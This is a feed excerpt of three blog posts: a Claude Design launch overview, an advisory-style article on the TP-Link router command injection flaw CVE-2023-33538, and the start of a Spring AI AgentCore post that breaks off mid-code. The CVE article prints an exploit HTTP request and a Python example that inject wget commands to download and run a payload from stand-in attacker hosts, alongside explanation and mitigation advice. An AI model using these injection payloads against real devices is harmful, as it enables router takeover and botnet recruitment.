      <guid>https://zeroday.forem.com/om_shree_0709/anthropic-just-launched-claude-design-heres-what-it-actually-changes-for-non-designers-5e3e</guid>
      <description>&lt;p&gt;Figma has been the unchallenged design layer for product teams for years. On April 17, 2026, Anthropic quietly placed a bet that the next design tool doesn't look like Figma at all — it looks like a conversation.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem It's Solving
&lt;/h2&gt;

&lt;p&gt;Design has always had a bottleneck that nobody talks about openly: the distance between the person with the idea and the person who can execute it. A founder has a vision for a landing page. A PM sketches a feature flow on a whiteboard. A marketer needs a campaign asset by end of day. In every case, they're either waiting on a designer, wrestling with a tool that wasn't built for them, or shipping something that looks like it was made in a hurry — because it was.&lt;/p&gt;

&lt;p&gt;Even experienced designers face a version of this. Exploration is rationed. There's rarely time to prototype ten directions when you have two days before a stakeholder review. So teams commit early, iterate less, and ship with more uncertainty than they'd like.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://claude.ai/design" rel="noopener noreferrer"&gt;Claude Design&lt;/a&gt; is Anthropic's answer to both problems simultaneously.&lt;/p&gt;

&lt;h2&gt;
  
  
  How It Actually Works
&lt;/h2&gt;

&lt;p&gt;The product is powered by &lt;a href="https://www.anthropic.com/news/claude-opus-4-7" rel="noopener noreferrer"&gt;Claude Opus 4.7&lt;/a&gt;, Anthropic's latest and most capable vision model. The core loop is simple: describe what you need, Claude builds a first version, and you refine it through conversation. But the details of how that refinement works are what separate this from a glorified prompt-to-image tool.&lt;/p&gt;

&lt;p&gt;You can comment inline on specific elements — not the whole design, a specific button or heading. You can edit text directly in the canvas. And in a genuinely interesting touch, Claude can generate custom adjustment sliders for spacing, color, and layout that let you tune parameters live without writing another prompt.&lt;/p&gt;

&lt;p&gt;The brand system integration is the piece that makes this credible for actual teams rather than solo experiments. During onboarding, Claude reads your codebase and design files and assembles a design system — your colors, typography, components. Every project after that uses it automatically. Teams can maintain multiple systems and switch between them per project.&lt;/p&gt;

&lt;p&gt;Input is flexible: start from a text prompt, upload images, DOCX, PPTX, or XLSX files, or point Claude at a codebase. There's also a web capture tool that grabs elements directly from your live site, so prototypes match the real product rather than approximating it.&lt;/p&gt;

&lt;p&gt;Collaboration is organization-scoped. Designs can be kept private, shared view-only with anyone in the org via link, or opened for group editing where multiple teammates can chat with Claude together in the same canvas. Output formats include internal URLs, standalone HTML files, PDF, PPTX, and direct export to &lt;a href="https://www.canva.com/" rel="noopener noreferrer"&gt;Canva&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The handoff to &lt;a href="https://claude.com/product/claude-code" rel="noopener noreferrer"&gt;Claude Code&lt;/a&gt; is the closing piece of the loop. When a design is ready to build, Claude packages it into a handoff bundle that Claude Code can consume directly. The intent is to eliminate the translation layer between design and implementation entirely.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Teams Are Actually Using It For
&lt;/h2&gt;

&lt;p&gt;Anthropic lists six use cases, and they span a wider range of roles than you'd expect from a "design tool." Designers are using it for rapid prototyping and broad exploration. PMs are using it to sketch feature flows before handing off to engineering. Founders are turning rough outlines into pitch decks. Marketers are drafting landing pages and campaign visuals before looping in a designer to finish.&lt;/p&gt;

&lt;p&gt;The early testimonials from teams are specific enough to be useful. Brilliant's senior product designer noted that their most complex pages — which previously required 20+ prompts in other tools — needed only 2 prompts in Claude Design. Datadog's PM described going from rough idea to working prototype before anyone leaves the room, with the output already matching their brand guidelines. Those aren't marketing abstractions; they're describing a workflow compression that most product teams would recognize as real.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why This Is a Bigger Deal Than It Looks
&lt;/h2&gt;

&lt;p&gt;The obvious read is that this is Anthropic entering the design tool market. The less obvious read is that Anthropic is extending the Claude Code workflow upward into the creative layer.&lt;/p&gt;

&lt;p&gt;Claude Code already handles the bottom of the product development stack — reading codebases, writing and editing files, managing git workflows. Claude Design handles the top — ideation, visual prototyping, stakeholder-ready output. The handoff bundle between the two is not a nice-to-have; it's the architectural seam Anthropic is betting on. If that seam works reliably, the design-to-deployment loop stops requiring multiple tools, multiple handoffs, and multiple rounds of translation.&lt;/p&gt;

&lt;p&gt;The Canva integration is also worth noting. Canva's CEO described the partnership as making it seamless to bring ideas from Claude Design into Canva for final polish and publishing. That positions Claude Design as the ideation and prototyping layer, with Canva as the finishing and distribution layer — rather than as direct competitors. It's a smart separation that gives Claude Design a clear lane without requiring it to replace every workflow Canva owns.&lt;/p&gt;

&lt;h2&gt;
  
  
  Availability and Access
&lt;/h2&gt;

&lt;p&gt;Claude Design launched April 17, 2026, in research preview. It's available for &lt;a href="https://claude.com/pricing" rel="noopener noreferrer"&gt;Claude Pro, Max, Team, and Enterprise&lt;/a&gt; subscribers, included with your existing plan and counted against subscription limits. Extra usage can be enabled if you hit those limits.&lt;/p&gt;

&lt;p&gt;For Enterprise organizations it's off by default; admins enable it through Organization settings. Access is at &lt;a href="https://claude.ai/design" rel="noopener noreferrer"&gt;claude.ai/design&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The research preview label matters. This is not a finished product. Anthropic says integrations with other tools are coming in the weeks ahead.&lt;/p&gt;




&lt;p&gt;The gap between "person with an idea" and "polished thing that exists" has always been where time, money, and momentum go to die. Claude Design is a direct attempt to close it — and the Claude Code handoff suggests Anthropic is thinking about the full stack, not just the canvas.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Follow for more coverage on MCP, agentic AI, and AI infrastructure.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>uidesign</category>
      <category>discuss</category>
      <category>productivity</category>
    </item>
    <item>
      <title>Anthropic Just Gave Claude a Design Studio. Here's What Claude Design Actually Does.</title>
      <dc:creator>Om Shree</dc:creator>
      <pubDate>Sat, 18 Apr 2026 04:44:41 +0000</pubDate>
      <link>https://zeroday.forem.com/om_shree_0709/anthropic-just-gave-claude-a-design-studio-heres-what-claude-design-actually-does-5h1f</link>
      <guid>https://zeroday.forem.com/om_shree_0709/anthropic-just-gave-claude-a-design-studio-heres-what-claude-design-actually-does-5h1f</guid>
      <description>&lt;p&gt;Figma has been the unchallenged center of digital design for years. Yesterday, Anthropic quietly placed a bet that AI can change that.&lt;/p&gt;

&lt;p&gt;On April 17, Anthropic launched &lt;strong&gt;&lt;a href="https://www.anthropic.com/news/claude-design-anthropic-labs" rel="noopener noreferrer"&gt;Claude Design&lt;/a&gt;&lt;/strong&gt; - a new product under its &lt;a href="https://www.anthropic.com/news/introducing-anthropic-labs" rel="noopener noreferrer"&gt;Anthropic Labs&lt;/a&gt; umbrella that lets you collaborate with Claude to build visual work: prototypes, slides, wireframes, landing pages, one-pagers, and more. It's powered by &lt;strong&gt;&lt;a href="https://www.anthropic.com/news/claude-opus-4-7" rel="noopener noreferrer"&gt;Claude Opus 4.7&lt;/a&gt;&lt;/strong&gt;, their latest vision model, and it's rolling out in research preview for Pro, Max, Team, and Enterprise subscribers right now.&lt;/p&gt;

&lt;p&gt;This isn't Claude generating pretty mockups you paste into Figma. This is a full design loop - ideation, iteration, export, and handoff - without ever leaving the chat.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Problem It's Solving
&lt;/h2&gt;

&lt;p&gt;Anthropic frames the core issue well: even experienced designers ration exploration. There's never enough time to prototype ten directions, so you pick two or three and commit. And for founders, PMs, and marketers who have a strong vision but no design background, turning ideas into shareable visuals has always required either hiring someone or learning tools that take months to master.&lt;/p&gt;

&lt;p&gt;Claude Design is trying to solve both problems at once. Give designers room to explore widely. Give everyone else a way to produce visual work that doesn't look like a Canva template from 2019.&lt;/p&gt;




&lt;h2&gt;
  
  
  How the Workflow Actually Works
&lt;/h2&gt;

&lt;p&gt;The flow is more structured than you'd expect from a chat-based tool.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Your brand gets built in first.&lt;/strong&gt; During onboarding, Claude reads your codebase and design files to build a design system - your colors, typography, components. Every project after that inherits it automatically. No more pasting hex codes into every prompt.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;You can start from anything.&lt;/strong&gt; A text prompt, uploaded images, a DOCX, PPTX, or XLSX file, your codebase, or a live website via the web capture tool. If you want the prototype to look like your actual product, you point it at your site and Claude pulls the elements directly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Iteration happens inline.&lt;/strong&gt; You can comment on specific elements, edit text directly, or use custom adjustment knobs - built by Claude - to tweak spacing, color, and layout live. Then ask Claude to apply changes across the entire design at once.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Collaboration is organization-scoped.&lt;/strong&gt; Keep designs private, share a view-only link inside your org, or grant edit access so teammates can jump into the same conversation with Claude together.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Export goes everywhere.&lt;/strong&gt; Standalone HTML, PDF, PPTX, a shareable internal URL, or directly to &lt;strong&gt;&lt;a href="https://www.canva.com" rel="noopener noreferrer"&gt;Canva&lt;/a&gt;&lt;/strong&gt;. The Canva integration is a first-class feature - designs land as fully editable Canva files, ready to refine and publish.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Handoff goes to Claude Code.&lt;/strong&gt; When a design is ready to build, Claude bundles everything into a handoff package you pass to &lt;strong&gt;&lt;a href="https://claude.com/product/claude-code" rel="noopener noreferrer"&gt;Claude Code&lt;/a&gt;&lt;/strong&gt; with a single instruction. Design to implementation in one pipeline.&lt;/p&gt;




&lt;h2&gt;
  
  
  What Teams Are Actually Using It For
&lt;/h2&gt;

&lt;p&gt;Anthropic lists six core use cases, and they're more specific than the usual "boost your productivity" marketing copy:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Realistic prototypes&lt;/strong&gt; - Designers turn static mockups into interactive, shareable prototypes without touching code or going through PR review.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Product wireframes&lt;/strong&gt; - PMs sketch feature flows and hand off directly to Claude Code for implementation, or to designers for refinement.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Design explorations&lt;/strong&gt; - Quick generation of a wide range of visual directions to explore before committing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pitch decks and presentations&lt;/strong&gt; - From rough outline to on-brand deck in minutes, exported as PPTX or sent to Canva.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Marketing collateral&lt;/strong&gt; - Landing pages, social media assets, campaign visuals, ready for designer polish.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Frontier design&lt;/strong&gt; - Code-powered prototypes with voice, video, shaders, 3D, and built-in AI.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That last one is the most interesting. "Frontier design" positions this beyond Figma's territory entirely - into interactive, AI-native artifacts that traditional design tools can't produce at all.&lt;/p&gt;




&lt;h2&gt;
  
  
  What Early Users Are Saying
&lt;/h2&gt;

&lt;p&gt;Three companies shared early reactions, and the numbers are specific enough to be credible.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://brilliant.org" rel="noopener noreferrer"&gt;Brilliant&lt;/a&gt;&lt;/strong&gt;, the interactive learning platform, noted that their most complex pages - which previously took 20+ prompts to recreate in other tools - required only 2 prompts in Claude Design. Their Senior Product Designer called the prototype-to-production handoff with Claude Code "seamless."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.datadoghq.com" rel="noopener noreferrer"&gt;Datadog&lt;/a&gt;&lt;/strong&gt;'s product team reported going from rough idea to working prototype before anyone leaves the room. Work that previously took a week of back-and-forth between briefs, mockups, and review rounds now happens in a single conversation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.canva.com" rel="noopener noreferrer"&gt;Canva&lt;/a&gt;&lt;/strong&gt; co-founder and CEO Melanie Perkins framed the integration as a natural extension of their mission - bringing Canva to wherever ideas begin. When a design exits Claude Design into Canva, it becomes fully editable and collaborative immediately.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why This Is a Bigger Deal Than It Looks
&lt;/h2&gt;

&lt;p&gt;Most AI design tools have been wrappers - you describe something, get an image, manually replicate it in your actual design tool. Claude Design is different in structure. The brand system, the inline editing, the Claude Code handoff, the Canva export - these aren't convenience features. They're the infrastructure of a complete design workflow.&lt;/p&gt;

&lt;p&gt;What Anthropic is building here is a &lt;strong&gt;design agent&lt;/strong&gt;, not a design assistant. One that holds context about your brand, your product, your team's work, and the full history of a project. That's the same pattern we've seen with &lt;a href="https://claude.com/product/claude-code" rel="noopener noreferrer"&gt;Claude Code&lt;/a&gt; in engineering - an AI that doesn't just answer questions but participates in the actual production pipeline.&lt;/p&gt;

&lt;p&gt;The implications for teams without dedicated design resources are significant. A founder with a clear vision and access to Claude Pro can now go from napkin sketch to investor-ready prototype without a single design hire. A PM can produce a feature wireframe precise enough to hand off to engineering directly. A marketer can generate a campaign landing page in a conversation.&lt;/p&gt;




&lt;h2&gt;
  
  
  Availability and Access
&lt;/h2&gt;

&lt;p&gt;Claude Design is available now in research preview for &lt;strong&gt;Pro, Max, Team, and Enterprise&lt;/strong&gt; subscribers at &lt;strong&gt;&lt;a href="https://claude.ai/design" rel="noopener noreferrer"&gt;claude.ai/design&lt;/a&gt;&lt;/strong&gt;. Access is included in your existing plan and uses your subscription limits, with the option to enable &lt;a href="https://support.claude.com/en/articles/12429409-manage-extra-usage-for-paid-claude-plans" rel="noopener noreferrer"&gt;extra usage&lt;/a&gt; if you go beyond them.&lt;/p&gt;

&lt;p&gt;For Enterprise orgs, it's off by default - admins can enable it via &lt;a href="https://support.claude.com/en/articles/14604406-claude-design-admin-guide-for-team-and-enterprise-plans" rel="noopener noreferrer"&gt;Organization settings&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Anthropic says integrations with more tools are coming in the next few weeks.&lt;/p&gt;




&lt;p&gt;Design just became part of the agentic stack. The question now is how fast the design community actually adopts it - and what Figma does next.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow for more coverage on MCP, agentic AI, and AI infrastructure.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>claude</category>
      <category>programming</category>
      <category>discuss</category>
    </item>
    <item>
      <title>CVE-2023-33538: The TP-Link Command Injection Flaw That's Still Being Actively Exploited</title>
      <dc:creator>Om Shree</dc:creator>
      <pubDate>Fri, 17 Apr 2026 16:48:09 +0000</pubDate>
      <link>https://zeroday.forem.com/om_shree_0709/cve-2023-33538-the-tp-link-command-injection-flaw-thats-still-being-actively-exploited-3gd7</link>
      <guid>https://zeroday.forem.com/om_shree_0709/cve-2023-33538-the-tp-link-command-injection-flaw-thats-still-being-actively-exploited-3gd7</guid>
      <description>&lt;p&gt;A vulnerability disclosed in 2023 is back in the news — because attackers are actively using it right now.&lt;/p&gt;

&lt;p&gt;CVE-2023-33538 is a command injection bug in several TP-Link home router models, rated CVSS 8.8 (&lt;a href="https://thehackernews.com/2025/06/tp-link-router-flaw-cve-2023-33538.html" rel="noopener noreferrer"&gt;The Hacker News&lt;/a&gt;). CISA added it to its Known Exploited Vulnerabilities catalog in June 2025 (&lt;a href="https://www.cvedetails.com/cve/CVE-2023-33538/" rel="noopener noreferrer"&gt;CVE Details&lt;/a&gt;), and Unit 42 researchers confirmed active exploitation attempts shortly after. The situation is messier than most CVE alerts because the affected products are end-of-life, meaning no vendor patches are available (&lt;a href="https://www.cvedetails.com/cve/CVE-2023-33538/" rel="noopener noreferrer"&gt;CVE Details&lt;/a&gt;). The fix is to throw the router away.&lt;/p&gt;

&lt;h2&gt;
  
  
  What's Vulnerable
&lt;/h2&gt;

&lt;p&gt;Three discontinued TP-Link router models are affected: TL-WR940N V2/V4, TL-WR841N V8/V10, and TL-WR740N V1/V2 (&lt;a href="https://cinchops.com/critical-tp-link-router-vulnerability-under-active-attack-cve-2023-33538/" rel="noopener noreferrer"&gt;CinchOps, Inc.&lt;/a&gt;). These are mass-market home routers. Millions were sold. A lot of them are still plugged in.&lt;/p&gt;

&lt;h2&gt;
  
  
  How the Vulnerability Works
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;/userRpm/WlanNetworkRpm&lt;/code&gt; endpoint mishandles the &lt;code&gt;ssid1&lt;/code&gt; parameter of an HTTP GET request. The router never sanitizes the parameter value, so an attacker can pass shell commands through it and achieve remote code execution on the device (&lt;a href="https://unit42.paloaltonetworks.com/exploitation-of-cve-2023-33538/" rel="noopener noreferrer"&gt;Palo Alto Networks&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;The attack surface is the router's web management interface. Early reporting suggested the flaw could be exploited without authentication in some configurations, with no need for login credentials or physical access (&lt;a href="https://cinchops.com/critical-tp-link-router-vulnerability-under-active-attack-cve-2023-33538/" rel="noopener noreferrer"&gt;CinchOps, Inc.&lt;/a&gt;). Unit 42's deeper analysis found a wrinkle, however: successful exploitation actually requires authentication to the router's web interface (&lt;a href="https://unit42.paloaltonetworks.com/exploitation-of-cve-2023-33538/" rel="noopener noreferrer"&gt;Palo Alto Networks&lt;/a&gt;). In practice that isn't much of a barrier, since most of these devices still run default credentials.&lt;/p&gt;

&lt;p&gt;A typical exploit request looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/userRpm/WlanNetworkRpm.htm?ssid1=HomeNetwork;wget+http://attacker.com/payload+-O+/tmp/x;chmod+777+/tmp/x;/tmp/x&lt;/span&gt; &lt;span class="k"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;192.168.1.1&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;ssid1&lt;/code&gt; parameter accepts the injected commands. The router executes them without validation.&lt;/p&gt;
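&lt;p&gt;The mechanics are easy to see in a few lines. The sketch below is illustrative Python, not TP-Link's actual firmware code: a hypothetical handler interpolates the unsanitized parameter straight into a shell command line, so everything after a &lt;code&gt;;&lt;/code&gt; rides along as a separate command.&lt;/p&gt;

```python
# Illustrative sketch of the vulnerable pattern (hypothetical handler,
# not TP-Link's firmware): the ssid1 value is dropped into a shell
# command line with no sanitization whatsoever.

def build_ssid_command(ssid1: str) -> str:
    # No validation, no quoting: whatever arrives in the query string
    # becomes part of the command line verbatim.
    return f"iwconfig wlan0 essid {ssid1}"

payload = "HomeNetwork;wget http://attacker.example/x -O /tmp/x;/tmp/x"
cmd = build_ssid_command(payload)
print(cmd)
# Everything after the first ';' would run as separate shell commands.
```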

&lt;h2&gt;
  
  
  What Attackers Are Actually Doing
&lt;/h2&gt;

&lt;p&gt;The observed payloads are malicious binaries characteristic of Mirai-like botnet malware, which the exploits attempt to download and execute on vulnerable devices (&lt;a href="https://unit42.paloaltonetworks.com/exploitation-of-cve-2023-33538/" rel="noopener noreferrer"&gt;Palo Alto Networks&lt;/a&gt;). The pattern is straightforward: find the router, authenticate with default credentials, inject a &lt;code&gt;wget&lt;/code&gt; command to pull down a binary, make it executable, run it.&lt;/p&gt;

&lt;p&gt;Unit 42's analysis uncovered something interesting, though: the exploit attempts contain errors. The endpoint &lt;code&gt;/userRpm/WlanNetworkRpm.htm&lt;/code&gt; is correct, but the exploits try to inject their commands into the &lt;code&gt;ssid&lt;/code&gt; parameter, while the actual vulnerable parameter on the target system is &lt;code&gt;ssid1&lt;/code&gt; (&lt;a href="https://unit42.paloaltonetworks.com/exploitation-of-cve-2023-33538/" rel="noopener noreferrer"&gt;Palo Alto Networks&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;So the attacks in the wild are technically flawed. They'd fail on a properly configured device. But that doesn't mean the underlying vulnerability isn't real — it is. It just means the botnet operators got the parameter name wrong, and the vulnerability is still wide open for anyone who looks at the original disclosure more carefully.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Botnet Connection
&lt;/h2&gt;

&lt;p&gt;In December 2024, Palo Alto Networks Unit 42 identified samples of an OT-centric malware called FrostyGoop. One of the IP addresses associated with an ENCO control device was also linked to a TP-Link WR740N router used to facilitate web browser access to the ENCO device (&lt;a href="https://www.secpod.com/blog/cisa-issues-warning-on-active-exploitation-of-tp-link-vulnerability-cve-2023-33538/" rel="noopener noreferrer"&gt;SecPod Blog&lt;/a&gt;). There is no direct evidence tying CVE-2023-33538 to that specific attack, but the association illustrates the real-world risk: compromised home routers becoming pivot points into operational technology networks, including industrial systems.&lt;/p&gt;

&lt;p&gt;Compromised routers can also be recruited into botnets to launch DDoS attacks, used to steal data transmitted through the network, or turned into a gateway for deploying malware on connected devices (&lt;a href="https://www.secpod.com/blog/cisa-issues-warning-on-active-exploitation-of-tp-link-vulnerability-cve-2023-33538/" rel="noopener noreferrer"&gt;SecPod Blog&lt;/a&gt;).&lt;/p&gt;

&lt;h2&gt;
  
  
  Why This Is Still a Problem in 2025
&lt;/h2&gt;

&lt;p&gt;The vulnerability was first disclosed in June 2023. TP-Link discontinued these router models in 2017. The combination of old hardware, no patch, and default credentials still in place on deployed devices is exactly the kind of long tail that keeps security researchers employed.&lt;/p&gt;

&lt;p&gt;TP-Link told The Hacker News that it has provided fixes through its tech support platform since 2018, and encouraged customers to contact support for patched firmware or to upgrade their devices (&lt;a href="https://thehackernews.com/2025/06/tp-link-router-flaw-cve-2023-33538.html" rel="noopener noreferrer"&gt;The Hacker News&lt;/a&gt;). The practical reality: most people who bought a TP-Link router eight years ago are not checking in with TP-Link support for firmware updates. The router is just sitting there, doing its job, running software from a decade ago.&lt;/p&gt;

&lt;p&gt;The EPSS score for this vulnerability sits at 90.63% probability of exploitation activity in the next 30 days (&lt;a href="https://www.cvedetails.com/cve/CVE-2023-33538/" rel="noopener noreferrer"&gt;CVE Details&lt;/a&gt;), which puts it in roughly the top percentile of all tracked CVEs for active exploitation risk.&lt;/p&gt;

&lt;h2&gt;
  
  
  What To Do
&lt;/h2&gt;

&lt;p&gt;If you own or manage any of the affected models (TL-WR940N V2/V4, TL-WR841N V8/V10, TL-WR740N V1/V2), the recommendation is unambiguous: replace the device. There is no patch coming.&lt;/p&gt;

&lt;p&gt;If replacement isn't immediate:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Disable remote management (usually under "Remote Management" or "Web Management" in router settings)&lt;/li&gt;
&lt;li&gt;Change default admin credentials to something non-trivial&lt;/li&gt;
&lt;li&gt;Segment the router from critical devices on your network&lt;/li&gt;
&lt;li&gt;Monitor for unusual outbound traffic&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For organizations doing network audits, these models will surface in legacy environments, branch offices, and home office setups for employees on VPN. They're worth explicitly checking for.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Broader Pattern
&lt;/h2&gt;

&lt;p&gt;CVE-2023-33538 is not an exotic vulnerability. It's a missing input sanitization check on a parameter that processes user input. The fix at the code level would have been a few lines. The real problem is that the devices were EOL before the vulnerability was even publicly documented, which means there's no vendor support left to deploy a fix.&lt;/p&gt;
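&lt;p&gt;For illustration, here is what that few-line fix could look like, sketched in Python rather than the router's actual C firmware: validate the value against an allowlist before it ever reaches a shell, and quote it defensively even then.&lt;/p&gt;

```python
import re
import shlex

# Hypothetical sketch of the missing check (not TP-Link code): reject
# anything outside a conservative SSID allowlist, then shell-quote the
# survivor anyway as defense in depth.
SSID_OK = re.compile(r"[A-Za-z0-9 _-]{1,32}")

def build_ssid_command(ssid1: str) -> str:
    if not SSID_OK.fullmatch(ssid1):
        raise ValueError("invalid SSID")
    # shlex.quote makes shell metacharacters inert even if the
    # allowlist is later loosened.
    return f"iwconfig wlan0 essid {shlex.quote(ssid1)}"

print(build_ssid_command("HomeNetwork"))  # -> iwconfig wlan0 essid HomeNetwork
# build_ssid_command("HomeNetwork;/tmp/x") would raise ValueError
```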

&lt;p&gt;This pattern keeps repeating. Old IoT hardware, no update mechanism, default credentials, perpetually connected. The Mirai botnet first appeared in 2016 exploiting default credentials on IoT devices. A decade later, the same playbook still works on millions of deployed devices.&lt;/p&gt;

&lt;p&gt;The vulnerability isn't the interesting part. The infrastructure that keeps these devices running for a decade after the vendor stopped caring is.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;References:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://unit42.paloaltonetworks.com/exploitation-of-cve-2023-33538/" rel="noopener noreferrer"&gt;Unit 42 Deep Dive — CVE-2023-33538&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cisa.gov/news-events/alerts/2025/06/16/cisa-adds-two-known-exploited-vulnerabilities-catalog" rel="noopener noreferrer"&gt;CISA KEV Catalog Entry&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2023-33538" rel="noopener noreferrer"&gt;NVD Detail&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://thehackernews.com/2025/06/tp-link-router-flaw-cve-2023-33538.html" rel="noopener noreferrer"&gt;The Hacker News Coverage&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>security</category>
      <category>discuss</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Spring AI SDK for Amazon Bedrock AgentCore: Build Production-Ready Java AI Agents</title>
      <dc:creator>Om Shree</dc:creator>
      <pubDate>Fri, 17 Apr 2026 02:51:56 +0000</pubDate>
      <link>https://zeroday.forem.com/om_shree_0709/spring-ai-sdk-for-amazon-bedrock-agentcore-build-production-ready-java-ai-agents-3h3d</link>
      <guid>https://zeroday.forem.com/om_shree_0709/spring-ai-sdk-for-amazon-bedrock-agentcore-build-production-ready-java-ai-agents-3h3d</guid>
      <description>&lt;p&gt;Java developers have always had a rough deal with agentic AI. The proof of concepts are easy enough — wrap a model call, return a string. But taking that to production means custom controllers, SSE streaming handlers, health check endpoints, rate limiting, memory repositories... weeks of infrastructure work before you've written a single line of actual agent logic.&lt;/p&gt;

&lt;p&gt;AWS just GA'd the Spring AI AgentCore SDK, and it collapses most of that into a single annotation.&lt;/p&gt;

&lt;h2&gt;
  
  
  What's Amazon Bedrock AgentCore
&lt;/h2&gt;

&lt;p&gt;AgentCore is AWS's managed platform for running AI agents at scale. It handles the infrastructure layer — scaling, reliability, security, observability — and provides building blocks like short and long-term memory, browser automation, and sandboxed code execution.&lt;/p&gt;

&lt;p&gt;The problem until now: integrating all of that into a Spring application required implementing the AgentCore Runtime contract yourself. Two specific endpoints (&lt;code&gt;/invocations&lt;/code&gt; and &lt;code&gt;/ping&lt;/code&gt;), SSE streaming with proper framing, health status signaling for long-running tasks, and all the Spring wiring on top. Not impossible, but tedious and error-prone.&lt;/p&gt;

&lt;p&gt;The SDK handles all of it automatically.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Core Idea: One Annotation
&lt;/h2&gt;

&lt;p&gt;Here's a complete, AgentCore-compatible AI agent:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight java"&gt;&lt;code&gt;&lt;span class="nd"&gt;@Service&lt;/span&gt;
&lt;span class="kd"&gt;public&lt;/span&gt; &lt;span class="kd"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;MyAgent&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;

    &lt;span class="kd"&gt;private&lt;/span&gt; &lt;span class="kd"&gt;final&lt;/span&gt; &lt;span class="nc"&gt;ChatClient&lt;/span&gt; &lt;span class="n"&gt;chatClient&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt;

    &lt;span class="kd"&gt;public&lt;/span&gt; &lt;span class="nf"&gt;MyAgent&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;ChatClient&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;Builder&lt;/span&gt; &lt;span class="n"&gt;builder&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;chatClient&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;builder&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;build&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt;
    &lt;span class="o"&gt;}&lt;/span&gt;

    &lt;span class="nd"&gt;@AgentCoreInvocation&lt;/span&gt;
    &lt;span class="kd"&gt;public&lt;/span&gt; &lt;span class="nc"&gt;String&lt;/span&gt; &lt;span class="nf"&gt;chat&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;PromptRequest&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;chatClient&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;prompt&lt;/span&gt;&lt;span class="o"&gt;()&lt;/span&gt;
            &lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;prompt&lt;/span&gt;&lt;span class="o"&gt;())&lt;/span&gt;
